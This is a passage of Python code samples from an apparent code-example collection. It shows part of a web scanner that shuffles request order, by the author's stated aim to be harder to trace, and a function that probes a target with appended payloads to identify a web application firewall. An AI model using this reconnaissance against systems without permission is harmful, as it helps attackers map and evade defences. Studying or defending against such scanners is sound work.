        self.outjson, self.wordlist = [], []
        self.host = host
        # get_urls() runs after every attribute above has been set.
        self.urls = self.get_urls(self.host)
        self.req = Requests()

        # Randomise the request order so it is harder to trace (the
        # author's stated reason).  Only the order changes: the same set of
        # URLs is requested, so per-source volume and the 404 ratio remain
        # reliable signals for detection.
        random.shuffle(self.urls)
示例#30
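def checkwaf(url):
    """Identify a WAF in front of ``url`` from its responses.

    Nothing is requested when ``iscdn`` is falsy for the parsed host.
    Otherwise the plain URL is fetched first, then each entry of the
    module-level ``payload`` is appended to it in turn, until the
    module-level ``verify`` attributes a response to a WAF.

    Args:
        url: URL of the target.

    Returns:
        ``'CDN IP'`` when ``iscdn`` is falsy for the host; the value
        ``verify`` returned for the first response attributed to a WAF; or
        ``'NoWAF'`` when none was identified or a request failed.
    """
    host = parse_host(url)

    if not iscdn(host):
        return 'CDN IP'

    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text)
        if result != 'NoWAF':
            return result
        for i in payload:
            r = req.get(url + i)
            result = verify(r.headers, r.text)
            if result != 'NoWAF':
                return result
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
    # Previously the function ended here without a return statement, so "no
    # WAF found" and "request failed" both yielded None although the result
    # had been initialised to 'NoWAF'.
    return 'NoWAF'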